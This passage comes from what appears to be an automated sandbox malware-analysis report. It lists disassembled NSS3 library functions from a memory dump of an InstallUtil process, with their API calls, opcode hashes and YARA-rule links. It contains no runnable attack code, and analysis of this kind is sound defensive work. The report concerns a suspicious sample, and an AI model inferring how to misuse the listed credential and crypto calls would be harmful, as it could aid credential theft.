                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 284873373-0
                                                                                                                  • Opcode ID: 60583ee19c42bf4dd5d22cc2a86984eccb0f154d1116895c0a181c3e86f3039a
                                                                                                                  • Instruction ID: c88f3727c8be61c6f802f560b081bd7c641321dd0f51ef95e881962d2ecd234f
                                                                                                                  • Opcode Fuzzy Hash: 60583ee19c42bf4dd5d22cc2a86984eccb0f154d1116895c0a181c3e86f3039a
                                                                                                                  • Instruction Fuzzy Hash: B811E671A00109ABDB10AF68ED499BF7B78EF4A228B554174EC0897301E731E955C7E1
                                                                                                                  Function 6C7AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C7AF0AD,6C7AF150,?,6C7AF150,?,?,?), ref: 6C7AECBA
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C7AECD1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C7AED02
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B116E
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C7AED5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2957673229-0
                                                                                                                  • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                  • Instruction ID: a2bc8b0c845238e0236d5956ccb2ed4839b0bc8b8692a528be48e860ca408243
                                                                                                                  • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                  • Instruction Fuzzy Hash: C921D1B1A007429BE700CF25DA49B52B7E4BFA4308F25C329E81C87A61FB70E5A5C7D1
                                                                                                                  Function 6C77C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_IsLoggedIn.NSS3(?,?), ref: 6C77C890
                                                                                                                    • Part of subcall function 6C778F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FAF
                                                                                                                    • Part of subcall function 6C778F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FD1
                                                                                                                    • Part of subcall function 6C778F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FFA
                                                                                                                    • Part of subcall function 6C778F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779013
                                                                                                                    • Part of subcall function 6C778F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779042
                                                                                                                    • Part of subcall function 6C778F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C77905A
                                                                                                                    • Part of subcall function 6C778F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779073
                                                                                                                    • Part of subcall function 6C778F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779111
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C77C8B2
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C77C8D0
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77C8EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 999015661-0
                                                                                                                  • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                  • Instruction ID: af821f7e46d29bd82176378720bb6389be0a8142d5ca0d028ed0eb079e8c88c6
                                                                                                                  • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                  • Instruction Fuzzy Hash: B6010C66E0121977DF2027BA9E84AFF35689F5915DF040135FC04A6B01F351881883F1
                                                                                                                  Function 6C7DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEDD4
                                                                                                                  • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEDFD
                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEE14
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7C9767,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEE33
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3903481028-0
                                                                                                                  • Opcode ID: 7010bfefc05ab2a46c2935cd8ed7614e3855351b51c3e8362105e4a0570dbd06
                                                                                                                  • Instruction ID: 2b16ecb641126986f22ec9e5e8ad3a5a53c21f3c584cfcd47f49ac2b4a72efb4
                                                                                                                  • Opcode Fuzzy Hash: 7010bfefc05ab2a46c2935cd8ed7614e3855351b51c3e8362105e4a0570dbd06
                                                                                                                  • Instruction Fuzzy Hash: FF11C2B1A0070BABEB219E65DE88B06F3ACEF0035DF264535E91992A01E731F464C7E1
                                                                                                                  Function 6C7C08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7C09B3,0000001A,?), ref: 6C7C08E9
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7C08FD
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C7C0939
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7C0953
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2572351645-0
                                                                                                                  • Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                  • Instruction ID: 68528eaa68175b53e51cabfe0acfa67d7405e2128ac5a8925705eb4ed08b541d
                                                                                                                  • Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                  • Instruction Fuzzy Hash: 4501C0F1B0164B6FFB149A369E14B673B98AF4431CF104439ED1AC6A41EB31E4148BD6
                                                                                                                  Function 6C778DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 284873373-0
                                                                                                                  • Opcode ID: d0cb88f74b8f24ea7d5d13b7abc18e666944fb00d1b82211ca721dc8ea0068d2
                                                                                                                  • Instruction ID: bd1c9e014e9cfa6f08702b7c5e2cabeb028e73b1f7a05eefbdd74c2a9c18bfdf
                                                                                                                  • Opcode Fuzzy Hash: d0cb88f74b8f24ea7d5d13b7abc18e666944fb00d1b82211ca721dc8ea0068d2
                                                                                                                  • Instruction Fuzzy Hash: B8118F71605A059BDB10AF78D688169BBF4FF05358F014929DC88D7700E730E854CBD2
                                                                                                                  Function 6C7FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C7E5F17,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FAC94
                                                                                                                  • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C7E5F17,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACA6
                                                                                                                  • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACC0
                                                                                                                  • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACDB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$DestroyFreeK11_Monitor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3989322779-0
                                                                                                                  • Opcode ID: 74b3be6aebbf364231d28da5d0db8c5d59c5be061d044669a555088284a97cb9
                                                                                                                  • Instruction ID: a9d3275c21e4a147b8a2c18e9a747754492631ad84fde71212bd894215ed412d
                                                                                                                  • Opcode Fuzzy Hash: 74b3be6aebbf364231d28da5d0db8c5d59c5be061d044669a555088284a97cb9
                                                                                                                  • Instruction Fuzzy Hash: 44014CB5701B029BE760DF69EA49757B7E8BF00669B104839D86AC3B10E731F055CBD1
                                                                                                                  Function 6C7BC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7BC5AD
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • CERT_DecodeCertPackage.NSS3(?,?,6C7BC610,?), ref: 6C7BC5C2
                                                                                                                    • Part of subcall function 6C7BC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7BC0E6
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C7BC5E0
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7BC5EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1454898856-0
                                                                                                                  • Opcode ID: 99a297e06d7edf29a26d955c21bd52a8b583f9aaf3148b06d890feb004a479e9
                                                                                                                  • Instruction ID: 9190849ce889992e88dc0566ffdaa8fb762a700f0fa2c170669c8cd927f7bd8b
                                                                                                                  • Opcode Fuzzy Hash: 99a297e06d7edf29a26d955c21bd52a8b583f9aaf3148b06d890feb004a479e9
                                                                                                                  • Instruction Fuzzy Hash: 1101A2B1E001046FEB10AF65DD0AEBF7B78DF04658F458179EC05AB341F671A919C6E1
                                                                                                                  Function 6C7A88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,?,6C7B08AA,?), ref: 6C7A88F6
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C7B08AA,?), ref: 6C7A890B
                                                                                                                  • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7B08AA,?), ref: 6C7A8936
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C7B08AA,?), ref: 6C7A8940
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 959714679-0
                                                                                                                  • Opcode ID: d0dc1a5671cae4617beddc0f6eb06f5959f76266fc4a84deddabdc6925e4919f
                                                                                                                  • Instruction ID: 2fec065c2b7cfe5c7718ff63d60ed20dc67a93d2f672497a2bb8deb027692877
                                                                                                                  • Opcode Fuzzy Hash: d0dc1a5671cae4617beddc0f6eb06f5959f76266fc4a84deddabdc6925e4919f
                                                                                                                  • Instruction Fuzzy Hash: 44019274A046459FDB00AFB9C188659BBF4FF05398F054A3AD898C7B01E730E4A5CBD6
                                                                                                                  Function 6C7B24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C78C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C78C154,?), ref: 6C7B24FA
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,6C78C154,?), ref: 6C7B2509
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C7B2525
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B2532
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 929835568-0
                                                                                                                  • Opcode ID: bddfea6fd0bbf081388e837bde06e89d16ab71eb88986413430658077225004b
                                                                                                                  • Instruction ID: f3b26cbf56777c54648a4170dd65bbd9ed6b8d01493a5c051dd87ad10edd4adf
                                                                                                                  • Opcode Fuzzy Hash: bddfea6fd0bbf081388e837bde06e89d16ab71eb88986413430658077225004b
                                                                                                                  • Instruction Fuzzy Hash: 13F096F230612137FA2029BA6E0DE7739ACDF416F8B140231BD29D66C1D961C801C1F1
                                                                                                                  Function 6C7E0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B2F88,6C7E0660,00000020,00000000,?,?,6C7E2C3D,?,00000000,00000000,?,6C7E2A28,00000060,00000001), ref: 6C7E0860
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C7E2C3D,?,00000000,00000000,?,6C7E2A28,00000060,00000001), ref: 6C7E0874
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E0884
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7E08A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2502187247-0
                                                                                                                  • Opcode ID: d61be6860049cdd3312d6eb8a34a7533bc5c6da9dcddd73f0f0f06c3a6a91adb
                                                                                                                  • Instruction ID: 9a819337ec30abfcfed5625e374087ad6f9a2f794e07567cc0b2a26ed4a60a83
                                                                                                                  • Opcode Fuzzy Hash: d61be6860049cdd3312d6eb8a34a7533bc5c6da9dcddd73f0f0f06c3a6a91adb
                                                                                                                  • Instruction Fuzzy Hash: 8C017B37E00240ABEB212F6AED48A557738EB1A31CF080131EC0856B02EF22D454D7E1
                                                                                                                  Function 6C7E0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
